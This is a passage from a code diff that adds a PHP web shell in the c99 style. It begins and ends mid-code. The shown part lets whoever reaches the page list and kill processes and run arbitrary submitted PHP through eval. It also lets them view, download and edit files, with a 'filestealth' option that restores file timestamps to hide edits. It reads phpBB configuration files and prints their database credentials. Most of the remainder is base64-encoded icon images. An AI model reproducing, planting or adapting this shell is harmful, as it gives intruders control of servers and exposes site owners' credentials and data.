        \n"; + if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); } + else { $handler = "tasklist"; } + $ret = dQ99exec($handler); + if (!$ret) { echo "Can't execute \"".$handler."\"!"; } + else { + if (empty($processes_sort)) { $processes_sort = $sort_default; } + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") { + $y = ""; + } + else { + $y = ""; + } + $ret = htmlspecialchars($ret); + if (!$win) { //Not Windows + if ($pid) { + if (is_null($sig)) { $sig = 9; } + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; } + } + while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); } + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i].""; + } + } + $head[$i] = ""; + $prcs = array(); + foreach ($stack as $line) { + if (!empty($line)) { + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) { $line[0] = "".$line[0].""; } + $line[] = "KILL"; + $prcs[] = $line; + } + } + } + //For Windows - Fixed By diKi + else { + while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); } + while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); } + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $stack[0]=str_replace("Image Name","ImageName",$stack[0]); + $stack[0]=str_replace("Session Name","SessionName",$stack[0]); + $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]); + $head = explode(" ",$stack[0]); + $stack = array_slice($stack,1); + $head = array_values($head); + if ($parsesort[1] != "a") { $y = ""; } + else { $y = ""; } + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i]).""; } + } + $prcs = array(); + unset($stack[0]); + foreach ($stack as $line) { + if (!empty($line)) { + $line = explode(" ",$line); + $line[4] = str_replace(".","",$line[4]); + $line[4] = intval($line[4]) * 1024; + unset($line[5]); + $prcs[] = $line; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); } + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "\n"; + foreach($tab as $i=>$k) { + echo ""; + foreach($k as $j=>$v) { + if ($win and $i > 0 and $j == 4) { $v = view_size($v); } + echo ""; + } + echo "\n"; + } + echo "
        ".$v."
        "; + } +} +if ($act == "eval") { + if (!empty($eval)) { + echo "Result of execution this PHP-code:
        "; + $tmp = @ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) { + @ob_clean(); + eval($eval); + $ret = @ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + @ob_clean(); + echo $tmp; + if ($eval_txt) { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
        "; + } + else {echo $ret."
        ";} + } + else { + if ($eval_txt) { + echo "
        "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "PHP-code Execution (Use without PHP Braces!)"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


         Display in text-area 
        "; +} +if ($act == "f") { + echo "
        "; + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { + if (file_exists($d.$f)) {echo "
        Permision denied (".htmlspecialchars($d.$f).")!
        ";} + else {echo "
        File does not exists (".htmlspecialchars($d.$f).")!
        Create
        ";} + } + else { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
        Select action/file-type:
        "; + foreach($arr as $t) { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
        "; + if ($ft == "info") { + echo "Information:"; + if (!$win) { + echo "
        Path ".$d.$f."
        Size ".view_size(filesize($d.$f))."
        MD5 ".md5_file($d.$f)."
        Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
        Perms".view_perms_color($d.$f)."
        Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
        Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
        MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."
        "; + $fi = fopen($d.$f,"rb"); + if ($fi) { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
        "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
        "; + $a2 .= "
        "; + } + } + echo "". + "". + "". + "". + "
        ".$a0."".$a1."".$a2."

        "; + } + $encoded = ""; + if ($base64 == 1) { + echo "Base64 Encode
        "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) { + echo "Base64 Encode + Chunk
        "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) { + echo "Base64 Encode + Chunk + Quotes
        "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
        "; + } + if (!empty($encoded)) + { + echo "

        "; + } + echo "HEXDUMP: [Full] [Preview]
        Base64: +
        [Encode + [+chunk + [+chunk+quotes + [Decode +

        "; + } + elseif ($ft == "html") { + if ($white) {@ob_clean();} + echo $r; + if ($white) {dQ99shexit();} + } + elseif ($ft == "txt") {echo "

        ".htmlspecialchars($r)."
        ";} + elseif ($ft == "ini") {echo "
        "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
        ";} + elseif ($ft == "phpsess") { + echo "
        ";
        +   $v = explode("|",$r);
        +   echo $v[0]."
        "; + var_dump(unserialize($v[1])); + echo "
        "; + } + elseif ($ft == "exe") { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

        Display in text-area
        "; + } + elseif ($ft == "sdb") {echo "
        "; var_dump(unserialize(base64_decode($r))); echo "
        ";} + elseif ($ft == "code") { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { + $arr = explode("\n",$r); + if (count($arr == 18)) { + include($d.$f); + echo "phpBB configuration is detected in this file!
        "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

        ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";} + echo "Parameters for manual connect:
        "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
        ";} + echo "

        "; + } + } + echo "
        "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {dQ99shexit();} + echo "
        "; + } + elseif ($ft == "download") { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") { + $inf = getimagesize($d.$f); + if (!$white) { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
        Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

        "; + } + else { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
          
        "; + } + elseif (!empty($ft)) {echo "
        Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
        ";} + else {echo "
        Unknown file type (".$ext."), please select type manually.
        ";} +} +echo "
        \n"; +} +} +else { +@ob_clean(); +$images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGdQChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1dQ19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9dQ7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9dQ////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9dQ01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9dQ01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++dQ/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/dQ6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5dQ4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwdQtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9dQwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSdQ10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 